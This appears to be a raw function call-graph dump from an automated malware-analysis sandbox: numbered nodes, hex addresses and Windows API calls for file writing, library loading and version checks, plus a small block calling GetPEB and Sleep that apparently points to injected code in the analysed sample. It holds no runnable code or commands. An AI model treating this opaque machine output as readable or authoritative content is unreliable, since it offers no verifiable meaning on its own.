87292->87178 87294 416b04 46 API calls 87293->87294 87295 420618 87294->87295 87295->87196 87296->87193 87297->87202 87301 4148b3 GetSystemTimeAsFileTime 87298->87301 87300 442c6b 87300->86807 87301->87300 87302->86814 87303->86820 87304->86820 87310 45272f 87305->87310 87306 414d04 61 API calls 87306->87310 87307 44afef GetSystemTimeAsFileTime 87307->87310 87308 4528a4 87308->86729 87308->86730 87309 4150d1 81 API calls 87309->87310 87310->87306 87310->87307 87310->87308 87310->87309 87312 44b1bc 87311->87312 87313 44b1ca 87311->87313 87314 4149c2 116 API calls 87312->87314 87315 44b1e1 87313->87315 87316 4149c2 116 API calls 87313->87316 87317 44b1d8 87313->87317 87314->87313 87346 4321a4 87315->87346 87318 44b2db 87316->87318 87317->86757 87318->87315 87320 44b2e9 87318->87320 87322 44b2f6 87320->87322 87325 414a46 82 API calls 87320->87325 87321 44b224 87323 44b253 87321->87323 87324 44b228 87321->87324 87322->86757 87350 43213d 87323->87350 87327 44b235 87324->87327 87330 414a46 82 API calls 87324->87330 87325->87322 87328 44b245 87327->87328 87331 414a46 82 API calls 87327->87331 87328->86757 87329 44b25a 87332 44b260 87329->87332 87333 44b289 87329->87333 87330->87327 87331->87328 87335 44b26d 87332->87335 87337 414a46 82 API calls 87332->87337 87360 44b0bf 87 API calls 87333->87360 87338 44b27d 87335->87338 87340 414a46 82 API calls 87335->87340 87336 44b28f 87361 4320f8 46 API calls 87336->87361 87337->87335 87338->86757 87340->87338 87341 44b295 87342 44b2a2 87341->87342 87343 414a46 82 API calls 87341->87343 87344 44b2b2 87342->87344 87345 414a46 82 API calls 87342->87345 87343->87342 87344->86757 87345->87344 87347 4321b4 87346->87347 87348 4321cb 87346->87348 87347->87321 87349 414d04 61 API calls 87348->87349 87349->87347 87351 4135bb 46 API calls 87350->87351 87352 432150 87351->87352 87353 4135bb 46 API calls 87352->87353 87354 432162 87353->87354 87355 4135bb 46 API calls 87354->87355 87356 432174 87355->87356 87358 432189 87356->87358 87362 4320f8 46 API calls 87356->87362 87358->87329 87359 432198 87359->87329 87360->87336 87361->87341 87362->87359 87363->86659 87364->86661 87365->86680 87366->86680 87367->86680 87368->86671 87369->86680 87370->86680 87371->86684 87372->86693 87373->86695 87374->86695 87424 410160 87375->87424 87377 41012f GetFullPathNameW 87378 410147 87377->87378 87378->86515 87380 4102cb SHGetDesktopFolder 87379->87380 87382 410333 87379->87382 87381 4102e0 87380->87381 87380->87382 87381->87382 87383 41031c SHGetPathFromIDListW 87381->87383 87382->86518 87383->87382 87385 4101bb 87384->87385 87390 425f4a 87384->87390 87386 410160 52 API calls 87385->87386 87387 4101c7 87386->87387 87428 410200 52 API calls 87387->87428 87388 4114ab 58 API calls 87388->87390 87390->87388 87393 425f6e 87390->87393 87391 4101d6 87429 410200 52 API calls 87391->87429 87393->86520 87394 4101e9 87394->86520 87396 40f760 126 API calls 87395->87396 87397 40f584 87396->87397 87398 429335 87397->87398 87399 40f58c 87397->87399 87402 4528bd 118 API calls 87398->87402 87400 40f598 87399->87400 87401 429358 87399->87401 87454 4033c0 113 API calls 87400->87454 87455 434034 86 API calls 87401->87455 87405 42934b 87402->87405 87408 429373 87405->87408 87409 42934f 87405->87409 87406 429369 87406->87408 87407 40f5b4 87407->86516 87411 4115d7 52 API calls 87408->87411 87410 431e58 82 API calls 87409->87410 87410->87401 87423 4293c5 87411->87423 87412 42959c 87413 413748 46 API calls 87412->87413 87414 4295a5 87413->87414 87415 431e58 82 API calls 87414->87415 87416 4295b1 87415->87416 87420 401b10 52 API calls 87420->87423 87423->87412 87423->87420 87430 444af8 87423->87430 87433 44b41c 87423->87433 87440 402780 87423->87440 87448 4022d0 87423->87448 87456 44c7dd 64 API calls 87423->87456 87425 410167 87424->87425 87426 4115d7 52 API calls 87425->87426 87427 41017e 87426->87427 87427->87377 87428->87391 87429->87394 87431 4115d7 52 API calls 87430->87431 87432 444b27 87431->87432 87432->87423 87434 44b429 87433->87434 87435 4115d7 52 API calls 87434->87435 87436 44b440 87435->87436 87437 44b45e 87436->87437 87438 401b10 52 API calls 87436->87438 87437->87423 87439 44b453 87438->87439 87439->87423 87441 402827 87440->87441 87444 402790 87440->87444 87443 4115d7 52 API calls 87441->87443 87442 4115d7 52 API calls 87445 402797 87442->87445 87443->87444 87444->87442 87446 4027bd 87445->87446 87447 4115d7 52 API calls 87445->87447 87446->87423 87447->87446 87449 4022e0 87448->87449 87451 40239d 87448->87451 87450 4115d7 52 API calls 87449->87450 87449->87451 87452 402320 87449->87452 87450->87452 87451->87423 87452->87451 87453 4115d7 52 API calls 87452->87453 87453->87452 87454->87407 87455->87406 87456->87423 87458 402539 87457->87458 87459 402417 87457->87459 87458->86524 87459->87458 87460 4115d7 52 API calls 87459->87460 87461 402443 87460->87461 87462 4115d7 52 API calls 87461->87462 87463 4024b4 87462->87463 87463->87458 87465 4022d0 52 API calls 87463->87465 87486 402880 95 API calls 87463->87486 87465->87463 87470 401566 87466->87470 87467 401794 87487 40e9a0 90 API calls 87467->87487 87470->87467 87471 40167a 87470->87471 87472 4010a0 52 API calls 87470->87472 87473 4017c0 87471->87473 87488 45e737 90 API calls 87471->87488 87472->87470 87473->86526 87475 40bc70 52 API calls 87474->87475 87484 40d451 87475->87484 87476 40d50f 87491 410600 52 API calls 87476->87491 87478 427c01 87492 45e737 90 API calls 87478->87492 87479 40e0a0 52 API calls 87479->87484 87481 40d519 87481->86529 87482 401b10 52 API calls 87482->87484 87484->87476 87484->87478 87484->87479 87484->87481 87484->87482 87489 40f310 53 API calls 87484->87489 87490 40d860 91 API calls 87484->87490 87486->87463 87487->87471 87488->87473 87489->87484 87490->87484 87491->87481 87492->87481 87493->86542 87494->86543 87496 42c5fe 87495->87496 87511 4091c6 87495->87511 87497 40bc70 52 API calls 87496->87497 87496->87511 87498 42c64e InterlockedIncrement 87497->87498 87499 42c665 87498->87499 87504 42c697 87498->87504 87502 42c672 InterlockedDecrement Sleep InterlockedIncrement 87499->87502 87499->87504 87500 42c737 InterlockedDecrement 87501 42c74a 87500->87501 87505 408f40 VariantClear 87501->87505 87502->87499 87502->87504 87503 42c731 87503->87500 87504->87500 87504->87503 87788 408e80 87504->87788 87507 42c752 87505->87507 87797 410c60 VariantClear 87507->87797 87511->86601 87512 42c6db 87513 402160 52 API calls 87512->87513 87514 42c6e5 87513->87514 87793 45340c 85 API calls 87514->87793 87516 42c6f1 87794 40d200 52 API calls 87516->87794 87518 42c6fb 87795 465124 53 API calls 87518->87795 87520 42c715 87521 42c76a 87520->87521 87522 42c719 87520->87522 87524 401b10 52 API calls 87521->87524 87796 46fe32 VariantClear 87522->87796 87525 42c77e 87524->87525 87526 401980 53 API calls 87525->87526 87533 42c796 87526->87533 87527 42c812 87799 46fe32 VariantClear 87527->87799 87529 42c82a InterlockedDecrement 87800 46ff07 54 API calls 87529->87800 87531 42c849 87535 42c9ec 87531->87535 87540 408f40 VariantClear 87531->87540 87543 402780 52 API calls 87531->87543 87548 401980 53 API calls 87531->87548 87803 40a780 87531->87803 87532 42c864 87801 45e737 90 API calls 87532->87801 87533->87527 87533->87532 87798 40ba10 52 API calls 87533->87798 87844 47d33e 331 API calls 87535->87844 87538 42c9fe 87845 46feb1 VariantClear VariantClear 87538->87845 87540->87531 87541 42ca08 87544 401b10 52 API calls 87541->87544 87542 408f40 VariantClear 87545 42c891 87542->87545 87543->87531 87546 42ca15 87544->87546 87802 410c60 VariantClear 87545->87802 87549 40c2c0 52 API calls 87546->87549 87548->87531 87550 42c874 87549->87550 87550->87542 87552 42ca59 87550->87552 87552->87552 87554 40afc4 87553->87554 87555 40b156 87553->87555 87556 40afd5 87554->87556 87557 42d1e3 87554->87557 87855 45e737 90 API calls 87555->87855 87562 40a780 194 API calls 87556->87562 87578 40b11a 87556->87578 87856 45e737 90 API calls 87557->87856 87560 42d1f8 87566 408f40 VariantClear 87560->87566 87561 40b143 87561->86601 87564 40b00a 87562->87564 87564->87560 87567 40b012 87564->87567 87565 42d4db 87565->87565 87566->87561 87568 40b04a 87567->87568 87569 42d231 VariantClear 87567->87569 87576 40b094 87567->87576 87572 40b05c 87568->87572 87857 40e270 VariantClear 87568->87857 87569->87572 87570 42d45a VariantClear 87570->87578 87571 40b108 87571->87578 87858 40e270 VariantClear 87571->87858 87574 4115d7 52 API calls 87572->87574 87572->87576 87574->87576 87576->87571 87577 42d425 87576->87577 87577->87570 87577->87578 87578->87561 87859 45e737 90 API calls 87578->87859 87580 408fff 87579->87580 87584 40900d 87579->87584 87860 403ea0 52 API calls 87580->87860 87583 42c3f6 87863 45e737 90 API calls 87583->87863 87584->87583 87586 42c44a 87584->87586 87587 40a780 194 API calls 87584->87587 87588 42c47b 87584->87588 87592 42c4cb 87584->87592 87593 42c564 87584->87593 87597 42c548 87584->87597 87598 409112 87584->87598 87601 4090df 87584->87601 87603 42c528 87584->87603 87605 4090ea 87584->87605 87613 4090f2 87584->87613 87862 4534e3 52 API calls 87584->87862 87864 40c4e0 194 API calls 87584->87864 87865 45e737 90 API calls 87586->87865 87587->87584 87866 451b42 61 API calls 87588->87866 87868 47faae 233 API calls 87592->87868 87594 408f40 VariantClear 87593->87594 87594->87613 87595 42c491 87595->87613 87867 45e737 90 API calls 87595->87867 87871 45e737 90 API calls 87597->87871 87598->87597 87608 40912b 87598->87608 87599 42c4da 87599->87613 87869 45e737 90 API calls 87599->87869 87601->87605 87606 408e80 VariantClear 87601->87606 87870 45e737 90 API calls 87603->87870 87609 408f40 VariantClear 87605->87609 87606->87605 87608->87613 87861 403e10 53 API calls 87608->87861 87609->87613 87611 40914b 87612 408f40 VariantClear 87611->87612 87612->87613 87613->86601 87872 408d90 87614->87872 87616 429778 87899 410c60 VariantClear 87616->87899 87618 429780 87619 42976c 87898 45e737 90 API calls 87619->87898 87620 408cf9 87620->87616 87620->87619 87622 408d2d 87620->87622 87888 403d10 87622->87888 87625 408d71 87625->86601 87626 408f40 VariantClear 87627 408d45 87626->87627 87627->87625 87627->87626 87629 425c87 87628->87629 87632 40d15f 87628->87632 87630 425cc7 87629->87630 87631 425ca1 TranslateAcceleratorW 87629->87631 87631->87632 87632->86601 87634 42602f 87633->87634 87637 40d17f 87633->87637 87634->86601 87635 40d18c 87635->86601 87636 42608e IsDialogMessageW 87636->87635 87636->87637 87637->87635 87637->87636 88175 430c46 GetClassLongW 87637->88175 87640 4096c6 87639->87640 87641 4115d7 52 API calls 87640->87641 87702 40a70c 87640->87702 87642 4096fa 87641->87642 87644 4115d7 52 API calls 87642->87644 87643 4013a0 52 API calls 87645 4297aa 87643->87645 87646 40971b 87644->87646 87647 4115d7 52 API calls 87645->87647 87648 409749 CharUpperBuffW 87646->87648 87650 40976a 87646->87650 87646->87702 87690 4297d1 87647->87690 87648->87650 87698 4097e5 87650->87698 88177 47dcbb 196 API calls 87650->88177 87652 408f40 VariantClear 87653 42ae92 87652->87653 88204 410c60 VariantClear 87653->88204 87655 42aea4 87656 409aa2 87658 4115d7 52 API calls 87656->87658 87662 409afe 87656->87662 87656->87690 87657 40a689 87659 4115d7 52 API calls 87657->87659 87658->87662 87675 40a6af 87659->87675 87660 409b2a 87664 429dbe 87660->87664 87727 409b4d 87660->87727 88185 40b400 VariantClear VariantClear 87660->88185 87661 40c2c0 52 API calls 87661->87698 87662->87660 87663 4115d7 52 API calls 87662->87663 87665 429d31 87663->87665 87669 429dd3 87664->87669 88186 40b400 VariantClear VariantClear 87664->88186 87668 429d42 87665->87668 88182 44a801 52 API calls 87665->88182 87666 409fd2 87672 40a045 87666->87672 87726 42a3f5 87666->87726 87680 40e0a0 52 API calls 87668->87680 87669->87727 88187 40e1c0 VariantClear 87669->88187 87670 429a46 VariantClear 87670->87698 87677 4115d7 52 API calls 87672->87677 87673 408f40 VariantClear 87673->87698 87682 4115d7 52 API calls 87675->87682 87683 40a04c 87677->87683 87679 4115d7 52 API calls 87679->87698 87684 429d57 87680->87684 87682->87702 87688 40a0a7 87683->87688 87692 4091e0 317 API calls 87683->87692 88183 453443 52 API calls 87684->88183 87686 42a42f 88191 45e737 90 API calls 87686->88191 87710 40a0af 87688->87710 88192 40c790 VariantClear 87688->88192 87689 4299d9 87693 408f40 VariantClear 87689->87693 88203 45e737 90 API calls 87690->88203 87692->87688 87697 4299e2 87693->87697 87694 429abd 87694->86601 87695 429d88 88184 453443 52 API calls 87695->88184 88179 410c60 VariantClear 87697->88179 87698->87656 87698->87657 87698->87661 87698->87670 87698->87673 87698->87675 87698->87679 87698->87689 87698->87690 87698->87694 87704 40a780 194 API calls 87698->87704 87705 42a452 87698->87705 88178 40c4e0 194 API calls 87698->88178 88180 40ba10 52 API calls 87698->88180 88181 40e270 VariantClear 87698->88181 87702->87643 87704->87698 87705->87652 87707 408f40 VariantClear 87739 40a162 87707->87739 87708 41130a 51 API calls 87708->87727 87709 402780 52 API calls 87709->87727 87711 40a11b 87710->87711 87712 42a4b4 VariantClear 87710->87712 87710->87739 87718 40a12d 87711->87718 88193 40e270 VariantClear 87711->88193 87712->87718 87713 40a780 194 API calls 87713->87727 87714 401980 53 API calls 87714->87727 87715 408e80 VariantClear 87715->87727 87717 4115d7 52 API calls 87717->87739 87718->87717 87718->87739 87719 408e80 VariantClear 87719->87739 87721 44a801 52 API calls 87721->87727 87722 42a74d VariantClear 87722->87739 87723 4115d7 52 API calls 87723->87727 87724 40a368 87725 42aad4 87724->87725 87734 40a397 87724->87734 88196 46fe90 VariantClear VariantClear 87725->88196 88190 47390f VariantClear 87726->88190 87727->87666 87727->87686 87727->87702 87727->87708 87727->87709 87727->87713 87727->87714 87727->87715 87727->87721 87727->87723 87727->87726 87731 409c95 87727->87731 88188 45f508 52 API calls 87727->88188 88189 403e10 53 API calls 87727->88189 87728 42a7e4 VariantClear 87728->87739 87729 42a886 VariantClear 87729->87739 87731->86601 87732 40a3ce 87746 40a3d9 87732->87746 88197 40b400 VariantClear VariantClear 87732->88197 87733 40e270 VariantClear 87733->87739 87734->87732 87759 40a42c 87734->87759 88176 40b400 VariantClear VariantClear 87734->88176 87737 42abaf 87742 42abd4 VariantClear 87737->87742 87753 40a4ee 87737->87753 87738 4115d7 52 API calls 87738->87739 87739->87707 87739->87719 87739->87722 87739->87724 87739->87725 87739->87728 87739->87729 87739->87733 87739->87738 87741 4115d7 52 API calls 87739->87741 88194 470870 52 API calls 87739->88194 88195 44ccf1 VariantClear 87739->88195 87740 40a4dc 87740->87753 88199 40e270 VariantClear 87740->88199 87743 42a5a6 VariantInit VariantCopy 87741->87743 87742->87753 87743->87739 87748 42a5c6 VariantClear 87743->87748 87744 42ac4f 87752 42ac79 VariantClear 87744->87752 87757 40a546 87744->87757 87747 40a41a 87746->87747 87750 42ab44 VariantClear 87746->87750 87746->87759 87747->87759 88198 40e270 VariantClear 87747->88198 87748->87739 87749 40a534 87749->87757 88200 40e270 VariantClear 87749->88200 87750->87759 87752->87757 87753->87744 87753->87749 87754 42ad28 87760 42ad4e VariantClear 87754->87760 87765 40a583 87754->87765 87757->87754 87758 40a571 87757->87758 87758->87765 88201 40e270 VariantClear 87758->88201 87759->87737 87759->87740 87760->87765 87762 40a650 87762->86601 87763 42ae0e VariantClear 87763->87765 87765->87762 87765->87763 88202 40e270 VariantClear 87765->88202 87766->86601 87767->86553 87768->86558 87769->86601 87770->86601 87771->86601 87772->86601 87773->86610 87774->86610 87775->86610 87776->86610 87777->86610 87778->86610 87779->86610 87781 403cdf 87780->87781 87782 408f40 VariantClear 87781->87782 87783 403ce7 87782->87783 87783->86596 87784->86610 87785->86610 87786->86601 87787->86550 87789 408e94 87788->87789 87790 408e88 87788->87790 87792 45340c 85 API calls 87789->87792 87791 408f40 VariantClear 87790->87791 87791->87789 87792->87512 87793->87516 87794->87518 87795->87520 87796->87503 87797->87511 87798->87533 87799->87529 87800->87531 87801->87550 87802->87511 87804 40a7a6 87803->87804 87805 40ae8c 87803->87805 87807 4115d7 52 API calls 87804->87807 87846 41130a 51 API calls 87805->87846 87841 40a7c6 87807->87841 87808 40a86d 87809 40abd1 87808->87809 87826 40a878 87808->87826 87851 45e737 90 API calls 87809->87851 87810 4115d7 52 API calls 87810->87841 87811 40bc10 53 API calls 87811->87841 87812 401b10 52 API calls 87812->87841 87814 40b5f0 89 API calls 87814->87841 87815 408e80 VariantClear 87815->87841 87816 42b791 VariantClear 87816->87841 87817 42ba2d VariantClear 87817->87841 87818 408f40 VariantClear 87818->87826 87819 40a884 87819->87531 87820 42b459 VariantClear 87820->87841 87821 40e270 VariantClear 87821->87841 87822 42b6f6 VariantClear 87822->87841 87824 408cc0 187 API calls 87824->87841 87825 42bc5b 87825->87531 87826->87818 87826->87819 87827 42bbf5 87852 45e737 90 API calls 87827->87852 87828 42bb6a 87854 44b92d VariantClear 87828->87854 87829 4115d7 52 API calls 87832 42b5b3 VariantInit VariantCopy 87829->87832 87831 408f40 VariantClear 87831->87841 87835 42b5d7 VariantClear 87832->87835 87832->87841 87835->87841 87837 42bc37 87853 45e737 90 API calls 87837->87853 87840 42bc48 87840->87828 87842 408f40 VariantClear 87840->87842 87841->87808 87841->87809 87841->87810 87841->87811 87841->87812 87841->87814 87841->87815 87841->87816 87841->87817 87841->87820 87841->87821 87841->87822 87841->87824 87841->87827 87841->87828 87841->87829 87841->87831 87841->87837 87843 4530c9 VariantClear 87841->87843 87847 45308a 53 API calls 87841->87847 87848 470870 52 API calls 87841->87848 87849 457f66 87 API calls 87841->87849 87850 472f47 127 API calls 87841->87850 87842->87828 87843->87841 87844->87538 87845->87541 87846->87841 87847->87841 87848->87841 87849->87841 87850->87841 87851->87828 87852->87828 87853->87840 87854->87825 87855->87557 87856->87560 87857->87572 87858->87578 87859->87565 87860->87584 87861->87611 87862->87584 87863->87613 87864->87584 87865->87613 87866->87595 87867->87613 87868->87599 87869->87613 87870->87613 87871->87593 87873 4289d2 87872->87873 87874 408db3 87872->87874 87902 45e737 90 API calls 87873->87902 87900 40bec0 90 API calls 87874->87900 87877 4289e5 87903 45e737 90 API calls 87877->87903 87878 408e5a 87878->87620 87880 428a05 87882 408f40 VariantClear 87880->87882 87882->87878 87883 408dc9 87883->87877 87883->87878 87883->87880 87884 40a780 194 API calls 87883->87884 87885 408e64 87883->87885 87887 408f40 VariantClear 87883->87887 87901 40ba10 52 API calls 87883->87901 87884->87883 87886 408f40 VariantClear 87885->87886 87886->87878 87887->87883 87889 408f40 VariantClear 87888->87889 87890 403d20 87889->87890 87891 403cd0 VariantClear 87890->87891 87892 403d4d 87891->87892 87904 46e91c 87892->87904 87907 467897 87892->87907 87951 45e17d 87892->87951 87961 4755ad 87892->87961 87893 403d76 87893->87616 87893->87627 87898->87616 87899->87618 87900->87883 87901->87883 87902->87877 87903->87880 87964 46e785 87904->87964 87906 46e92f 87906->87893 87908 4678bb 87907->87908 87940 467954 87908->87940 88068 45340c 85 API calls 87908->88068 87909 4115d7 52 API calls 87910 467989 87909->87910 87912 467995 87910->87912 88072 40da60 53 API calls 87910->88072 87916 4533eb 85 API calls 87912->87916 87913 4678f6 87915 413a0e 46 API calls 87913->87915 87917 4678fc 87915->87917 87918 4679b7 87916->87918 87919 401b10 52 API calls 87917->87919 87920 40de40 60 API calls 87918->87920 87921 46790c 87919->87921 87922 4679c3 87920->87922 88069 40d200 52 API calls 87921->88069 87924 4679c7 GetLastError 87922->87924 87925 467a05 87922->87925 87927 403cd0 VariantClear 87924->87927 87930 467a2c 87925->87930 87931 467a4b 87925->87931 87926 467917 87926->87940 88070 4339fa GetFileAttributesW FindFirstFileW FindClose 87926->88070 87928 4679dc 87927->87928 87932 4679e6 87928->87932 87936 44ae3e CloseHandle 87928->87936 87935 4115d7 52 API calls 87930->87935 87933 4115d7 52 API calls 87931->87933 87939 408f40 VariantClear 87932->87939 87937 467a49 87933->87937 87934 467928 87938 46792f 87934->87938 87934->87940 87942 467a31 87935->87942 87936->87932 87946 408f40 VariantClear 87937->87946 88071 4335cd 56 API calls 87938->88071 87944 4679ed 87939->87944 87940->87909 87941 467964 87940->87941 87941->87893 88073 436299 52 API calls 87942->88073 87944->87893 87948 467a88 87946->87948 87947 467939 87947->87940 87949 408f40 VariantClear 87947->87949 87948->87893 87950 467947 87949->87950 87950->87940 87952 45e198 87951->87952 87953 45e19c 87952->87953 87954 45e1b8 87952->87954 87955 408f40 VariantClear 87953->87955 87956 45e1cc 87954->87956 87957 45e1db FindClose 87954->87957 87958 45e1a4 87955->87958 87959 45e1d9 87956->87959 87960 44ae3e CloseHandle 87956->87960 87957->87959 87958->87893 87959->87893 87960->87959 88074 475077 87961->88074 87963 4755c0 87963->87893 87965 46e7a2 87964->87965 87966 4115d7 52 API calls 87965->87966 87969 46e802 87965->87969 87967 46e7ad 87966->87967 87968 46e7b9 87967->87968 88012 40da60 53 API calls 87967->88012 88013 4533eb 87968->88013 87970 46e7e5 87969->87970 87977 46e82f 87969->87977 87971 408f40 VariantClear 87970->87971 87973 46e7ea 87971->87973 87973->87906 87976 46e8b5 88005 4680ed 87976->88005 87977->87976 87980 46e845 87977->87980 87982 4533eb 85 API calls 87980->87982 87992 46e84b 87982->87992 87983 46e7db 87983->87970 88029 44ae3e 87983->88029 87984 46e87a 88032 4689f4 59 API calls 87984->88032 87986 46e8bb 88009 443fbe 87986->88009 87987 46e883 87990 4013c0 52 API calls 87987->87990 87993 46e88f 87990->87993 87992->87984 87992->87987 87994 40e0a0 52 API calls 87993->87994 87996 46e899 87994->87996 87995 408f40 VariantClear 88003 46e881 87995->88003 88033 40d200 52 API calls 87996->88033 87997 46e911 87997->87906 87999 46e8a5 88034 4689f4 59 API calls 87999->88034 88002 46e903 88004 44ae3e CloseHandle 88002->88004 88003->87997 88035 40da20 88003->88035 88004->87997 88006 468100 88005->88006 88007 4680fa 88005->88007 88006->87986 88039 467ac4 55 API calls 88007->88039 88040 443e36 88009->88040 88011 443fd3 88011->87995 88011->88003 88012->87968 88014 453404 88013->88014 88015 4533f8 88013->88015 88017 40de40 88014->88017 88015->88014 88047 4531b1 85 API calls 88015->88047 88018 40da20 CloseHandle 88017->88018 88019 40de4e 88018->88019 88048 40f110 88019->88048 88021 4264fa 88024 40de84 88057 40e080 SetFilePointerEx SetFilePointerEx 88024->88057 88026 40de8b 88058 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88026->88058 88028 40de90 88028->87977 88028->87983 88030 44ae4b 88029->88030 88060 443fdf 88029->88060 88030->87970 88032->88003 88033->87999 88034->88003 88036 40da37 88035->88036 88037 40da29 88035->88037 88036->88037 88038 40da3c CloseHandle 88036->88038 88037->88002 88038->88002 88039->88006 88043 443e19 88040->88043 88044 443e26 88043->88044 88045 443e32 WriteFile 88043->88045 88046 443db4 SetFilePointerEx SetFilePointerEx 88044->88046 88045->88011 88046->88045 88047->88014 88049 40f125 CreateFileW 88048->88049 88050 42630c 88048->88050 88051 40de74 88049->88051 88050->88051 88052 426311 CreateFileW 88050->88052 88051->88021 88056 40dea0 55 API calls 88051->88056 88052->88051 88053 426337 88052->88053 88059 40df90 SetFilePointerEx SetFilePointerEx 88053->88059 88055 426342 88055->88051 88056->88024 88057->88026 88058->88028 88059->88055 88061 40da20 CloseHandle 88060->88061 88062 443feb 88061->88062 88068->87913 88069->87926 88070->87934 88071->87947 88072->87912 88073->87937 88075 4533eb 85 API calls 88074->88075 88076 4750b8 88075->88076 88077 4750ee 88076->88077 88078 475129 88076->88078 88079 408f40 VariantClear 88077->88079 88127 4646e0 88078->88127 88087 4750f5 88079->88087 88081 47515e 88082 475162 88081->88082 88114 47518e 88081->88114 88084 408f40 VariantClear 88082->88084 88083 475357 88085 475365 88083->88085 88086 4754ea 88083->88086 88101 475169 88084->88101 88161 44b3ac 57 API calls 88085->88161 88167 464812 92 API calls 88086->88167 88087->87963 88091 475374 88140 430d31 88091->88140 88092 4754fc 88092->88091 88093 475508 88092->88093 88095 408f40 VariantClear 88093->88095 88094 4533eb 85 API calls 88094->88114 88097 47550f 88095->88097 88097->88101 88098 475388 88147 4577e9 88098->88147 88101->87963 88102 47539e 88155 410cfc 88102->88155 88103 475480 88104 408f40 VariantClear 88103->88104 88104->88101 88113 4754b5 88115 408f40 VariantClear 88113->88115 88114->88083 88114->88094 88114->88103 88114->88113 88159 436299 52 API calls 88114->88159 88160 463ad5 64 API calls 88114->88160 88115->88101 88170 4536f7 53 API calls 88127->88170 88129 4646fc 88171 4426cd 59 API calls 88129->88171 88131 464711 88133 40bc70 52 API calls 88131->88133 88139 46474b 88131->88139 88134 46472c 88133->88134 88172 461465 52 API calls 88134->88172 88136 464741 88138 40c600 52 API calls 88136->88138 88137 464793 88137->88081 88138->88139 88139->88137 88173 463ad5 64 API calls 88139->88173 88141 430db2 88140->88141 88142 430d54 88140->88142 88141->88098 88143 4115d7 52 API calls 88142->88143 88144 430d74 88143->88144 88145 430da9 88144->88145 88146 4115d7 52 API calls 88144->88146 88145->88098 88146->88144 88148 457a84 88147->88148 88154 45780c 88147->88154 88148->88102 88149 45340c 85 API calls 88149->88154 88150 443006 57 API calls 88150->88154 88152 4135bb 46 API calls 88152->88154 88153 40f6f0 54 API calls 88153->88154 88154->88148 88154->88149 88154->88150 88154->88152 88154->88153 88174 44b3ac 57 API calls 88154->88174 88159->88114 88160->88114 88161->88091 88167->88092 88170->88129 88171->88131 88172->88136 88173->88137 88174->88154 88175->87637 88176->87732 88177->87650 88178->87698 88179->87762 88180->87698 88181->87698 88182->87668 88183->87695 88184->87660 88185->87664 88186->87669 88187->87727 88188->87727 88189->87727 88190->87686 88191->87705 88192->87688 88193->87718 88194->87739 88195->87739 88196->87732 88197->87746 88198->87759 88199->87753 88200->87757 88201->87765 88202->87765 88203->87705 88204->87655 88205 42d154 88209 480a8d 88205->88209 88207 42d161 88208 480a8d 194 API calls 88207->88208 88208->88207 88210 480ae4 88209->88210 88211 480b26 88209->88211 88213 480aeb 88210->88213 88214 480b15 88210->88214 88212 40bc70 52 API calls 88211->88212 88224 480b2e 88212->88224 88216 480aee 88213->88216 88217 480b04 88213->88217 88242 4805bf 194 API calls 88214->88242 88216->88211 88219 480af3 88216->88219 88241 47fea2 194 API calls 88217->88241 88240 47f135 194 API calls 88219->88240 88220 40e0a0 52 API calls 88220->88224 88223 408f40 VariantClear 88226 481156 88223->88226 88224->88220 88225 480aff 88224->88225 88229 401980 53 API calls 88224->88229 88231 40c2c0 52 API calls 88224->88231 88232 480ff5 88224->88232 88233 408e80 VariantClear 88224->88233 88234 40e710 53 API calls 88224->88234 88235 40a780 194 API calls 88224->88235 88243 45377f 52 API calls 88224->88243 88244 45e951 53 API calls 88224->88244 88245 40e830 53 API calls 88224->88245 88246 47925f 53 API calls 88224->88246 88247 47fcff 194 API calls 88224->88247 88225->88223 88227 408f40 VariantClear 88226->88227 88228 48115e 88227->88228 88228->88207 88229->88224 88231->88224 88248 45e737 90 API calls 88232->88248 88233->88224 88234->88224 88235->88224 88240->88225 88241->88225 88242->88225 88243->88224 88244->88224 88245->88224 88246->88224 88247->88224 88248->88225 88249 44023f8 88263 4400048 88249->88263 88251 440247a 88266 44022e8 88251->88266 88269 44034a8 GetPEB 88263->88269 88265 44006d3 88265->88251 88267 44022f1 Sleep 88266->88267 88268 44022ff 88267->88268 88270 44034d2 88269->88270 88270->88265 88271 42b14b 88278 40bc10 88271->88278 88273 42b159 88274 4096a0 331 API calls 88273->88274 88275 42b177 88274->88275 88289 44b92d VariantClear 88275->88289 88277 42bc5b 88279 40bc24 88278->88279 88280 40bc17 88278->88280 88282 40bc2a 88279->88282 88283 40bc3c 88279->88283 88281 408e80 VariantClear 88280->88281 88284 40bc1f 88281->88284 88285 408e80 VariantClear 88282->88285 88286 4115d7 52 API calls 88283->88286 88284->88273 88287 40bc33 88285->88287 88288 40bc43 88286->88288 88287->88273 88288->88273 88289->88277 88290 425b2b 88295 40f000 88290->88295 88294 425b3a 88296 4115d7 52 API calls 88295->88296 88297 40f007 88296->88297 88298 4276ea 88297->88298 88304 40f030 88297->88304 88303 41130a 51 API calls 88303->88294 88305 40f039 88304->88305 88307 40f01a 88304->88307 88334 41130a 51 API calls 88305->88334 88308 40e500 88307->88308 88309 40bc70 52 API calls 88308->88309 88310 40e515 GetVersionExW 88309->88310 88311 402160 52 API calls 88310->88311 88312 40e557 88311->88312 88335 40e660 88312->88335 88318 427674 88321 4276c6 GetSystemInfo 88318->88321 88320 40e5cd GetCurrentProcess 88356 40ef20 LoadLibraryA GetProcAddress 88320->88356 88322 4276d5 GetSystemInfo 88321->88322 88325 40e5e0 88325->88322 88349 40efd0 88325->88349 88327 40e629 88353 40ef90 88327->88353 88330 40e641 FreeLibrary 88331 40e644 88330->88331 88332 40e653 FreeLibrary 88331->88332 88333 40e656 88331->88333 88332->88333 88333->88303 88334->88307 88336 40e667 88335->88336 88337 42761d 88336->88337 88338 40c600 52 API calls 88336->88338 88339 40e55c 88338->88339 88340 40e680 88339->88340 88341 40e687 88340->88341 88342 427616 88341->88342 88343 40c600 52 API calls 88341->88343 88344 40e566 88343->88344 88344->88318 88345 40ef60 88344->88345 88346 40e5c8 88345->88346 88347 40ef66 LoadLibraryA 88345->88347 88346->88320 88346->88325 88347->88346 88348 40ef77 GetProcAddress 88347->88348 88348->88346 88350 40e620 88349->88350 88351 40efd6 LoadLibraryA 88349->88351 88350->88321 88350->88327 88351->88350 88352 40efe7 GetProcAddress 88351->88352 88352->88350 88357 40efb0 LoadLibraryA GetProcAddress 88353->88357 88355 40e632 GetNativeSystemInfo 88355->88330 88355->88331 88356->88325 88357->88355 88358 425b5e 88363 40c7f0 88358->88363 88362 425b6d 88398 40db10 52 API calls 88363->88398 88365 40c82a 88399 410ab0 6 API calls 88365->88399 88367 40c86d 88368 40bc70 52 API calls 88367->88368 